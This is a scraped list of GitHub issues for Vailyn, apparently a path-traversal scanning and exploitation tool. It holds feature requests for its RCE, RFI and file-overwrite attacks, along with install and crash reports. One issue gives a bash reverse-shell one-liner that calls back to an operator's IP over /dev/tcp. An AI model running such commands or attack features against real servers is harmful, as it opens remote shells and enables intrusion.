vainlystrain / vailyn Goto Github PK

When downloading files, extract the leaked data from the rest of the HTML document.

The attack routines are way too complex, and contain duplicate code. Clean them up by splitting them into several smaller functions, and regrouping similar behaviour in 1 function.

In the current version, every RCE technique is probed at every run. Add a choice prompt (like the one for payloads) that lets the user select which techniques to use.

Category
Installation issue on Kali

Describe the bug
Installation fails due to pyqt5 dependency

To Reproduce

1. pip install -r requirements.txt
2. See error below:

root@kali:/opt/Vailyn# pip install -r requirements.txt 
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Collecting treelib
  Using cached treelib-1.6.1.tar.gz (24 kB)
Requirement already satisfied: requests in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 2)) (2.18.4)
Requirement already satisfied: argparse in /usr/lib/python2.7 (from -r requirements.txt (line 3)) (1.2.1)
Requirement already satisfied: colorama in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 4)) (0.4.3)
ERROR: Could not find a version that satisfies the requirement PyQt5 (from -r requirements.txt (line 5)) (from versions: none)
ERROR: No matching distribution found for PyQt5 (from -r requirements.txt (line 5))

Expected behaviour
Clean installation is expected.

Desktop

• OS: Kali Linux

Distributor ID: Kali
Description:    Kali GNU/Linux Rolling
Release:        2020.3
Codename:       kali-rolling

Linux kali 5.4.0-kali4-amd64 #1 SMP Debian 5.4.19-1kali1 (2020-02-17) x86_64 GNU/Linux

• Python Version - 2.7.18
• pip 20.2

Provide more output in the RCE module, both for CLI and GUI.

Make it easier to switch the payload used for RCE by saving it in one variable.

Remove hardcoded depth from RCE and replace it by the depth used in the leak phase.

The RCE module does not scan for null bytes. This will be fixed together with #7 .

Add support for RFI scanning & exploitation.

In Phase 1, it is possible to do a targeted attack. If you know file.php is just above the inclusion folder, you can specify -d 1 x x to greatly reduce the attack duration.

However, if the file sits 3 levels above, Vailyn will still check level 1 and 2.

Extend the targeted attack feature with a new argument --targeted. If provided, only check the exact Phase 1 depth.

If the target server is only running on 1 thread, and a reverse shell is spawned, the server doesn't accept HTTP connections any more, leading to a DoS scenario. If this happens in your operation, perform the following steps:

1. create a new listener on a different port
2. in your current shell, enter the following command:

bash -i >& /dev/tcp/{YOUR IP}/{NEW PORT} 0>&1 & exit

This will spawn a new shell on your second port and terminate the first, and the server will accept connections again.

Add an option to scan for absolute paths, instead of relative ones.

root@kali:~/Vailyn# python3 Vailyn -h
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/dbus/bus.py", line 177, in activate_name_owner
return self.get_name_owner(bus_name)
File "/usr/lib/python3/dist-packages/dbus/bus.py", line 361, in get_name_owner
return self.call_blocking(BUS_DAEMON_NAME, BUS_DAEMON_PATH,
File "/usr/lib/python3/dist-packages/dbus/connection.py", line 652, in call_blocking
reply_message = self.send_message_with_reply_and_block(
dbus.exceptions.DBusException: org.freedesktop.DBus.Error.NameHasNoOwner: Could not get owner of name 'org.freedesktop.Notifications': no such name

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/root/Vailyn/Vailyn", line 113, in
notify2.init("Vailyn")
File "/usr/local/lib/python3.9/dist-packages/notify2.py", line 102, in init
dbus_obj = bus.get_object('org.freedesktop.Notifications',
File "/usr/lib/python3/dist-packages/dbus/bus.py", line 241, in get_object
return self.ProxyObjectClass(self, bus_name, object_path,
File "/usr/lib/python3/dist-packages/dbus/proxies.py", line 250, in init
self._named_service = conn.activate_name_owner(bus_name)
File "/usr/lib/python3/dist-packages/dbus/bus.py", line 182, in activate_name_owner
self.start_service_by_name(bus_name)
File "/usr/lib/python3/dist-packages/dbus/bus.py", line 277, in start_service_by_name
return (True, self.call_blocking(BUS_DAEMON_NAME, BUS_DAEMON_PATH,
File "/usr/lib/python3/dist-packages/dbus/connection.py", line 652, in call_blocking
reply_message = self.send_message_with_reply_and_block(
dbus.exceptions.DBusException: org.freedesktop.DBus.Error.ServiceUnknown: The name org.freedesktop.Notifications was not provided by any .service files

Add a possibility to configure the crawler to only scan for a subset of vectors (instead of all).

Greetings!

I started the first run about 25 minutes back. The % loading is at 13%. This is a query attack run (-a 1) with a very short file & directory list (<10 entries).

1. Is this expected behavior? Or it is only a first-run behavior?
2. What parameters does this loading depend on? Is there a way to speed this up?

Thanks.

In Vailyn 2.3, a severe memory issue has been resolved, causing systems to run out of memory with big directory dictionaries. Users are advised to update to the latest version, especially when attacking with huge dictionaries. More improvements towards dictionary handling planned in the future.

Add an option to config.py that lets the user specify a custom payload for the RCE module.

Is your feature request related to a problem? Please describe.
In Vailyn 1.5.1, attacking through Tor is only possible for Linux, because the command used to start the service (systemctl), is not available on Windows.

Describe the solution you'd like
Make Tor piping available for Windows-based systems.

Additional context
Since I don't have a Windows machine (and VM installations broken), I will need a hand for implementing this.

Before trying to spawn a full bash shell, confirm that RCE works using $_GET["cmd"].

Category
False Positive | False Negative

Describe the bug
The requests library which this project uses has some strange behaviours, which leads to the POST attack (-a 4) not working correctly.

The issue:
When you use a data dictionary for the POST request, requests percent-encodes the POST data. This leads that more complex evasion payloads fail, even if they should work. Also, the output of the scanner will be wrong. Let's say the server is vulnerable to ..%252f. Then, when Vailyn scans for ..%2f, it is detected as vulnerable, since requests transforms it into %252f. However, ..%2f will be shown as successful, while the real %252f test won't be.

There have been several ways to fix that in the past - none of them worked in this case.

The first way I have tried to fix it is using prepared requests, and manually setting the body afterwards. The second way was that I used a string for the data argument, instead of a dict. However, both tries resulted in the scanner finding nothing at all, despite a vulnerability being present.

If anyone reading this knows a fix: I'd really appreciate your help!

To Reproduce
Steps to reproduce the behaviour:

1. Set up a server with a path traversal vulnerability coming from a POST parameter.
2. Run Vailyn against this server.

Expected behaviour
Vailyn should output the vulnerability, and the correct payload.

Desktop (please complete the following information):

• OS: [e.g. Windows, Linux] probably all
• Program Version [e.g. 1.0] <= latest
• Python Version [e.g. 3.7] 3.8
• Requests Version: 2.24.0

Add an option to exploit a path traversal in an upload routine, in order to replace a legitimate server file by a version containing a user-specified payload.

Redirect the spawned subprocess to /dev/null, hiding the GUI output in the main Vailyn terminal.

Category
| Program Crash |

Describe the bug
The program gives the error:
└─# python3.8 Vailyn
Traceback (most recent call last):
File "Vailyn", line 40, in
from PyQt5.QtCore import Qt
ModuleNotFoundError: No module named 'PyQt5.sip'

I have installed all required modules, yet get above error.

To Reproduce
Steps to reproduce the behaviour:

1. Arguments used '...'
2. Selected payloads '....'
3. See error '....'

Expected behaviour
The program to run.

Screenshots
If applicable, add screenshots to help explain your problem.

Desktop (please complete the following information):

• OS: Kali rolling (fully updated)
• Program Version latest
• Python Version 3.8

Additional context
Add any other context about the problem here.

The example commands includes dicts/files and dicts/dirs as the wordlists to use.

They are not included on the repo, are we supposed to get them elsewhere or create them? Seems strange that the one thing needed to make the tool work is missing from the repo. dirs2 and files2 are included but they are too limited to be effective. Maybe I'm misunderstanding the intention behind this project.

I would suggest adding to the wiki some mention of the wordlists to clarify. I'm shocked I'm the first person to ask this.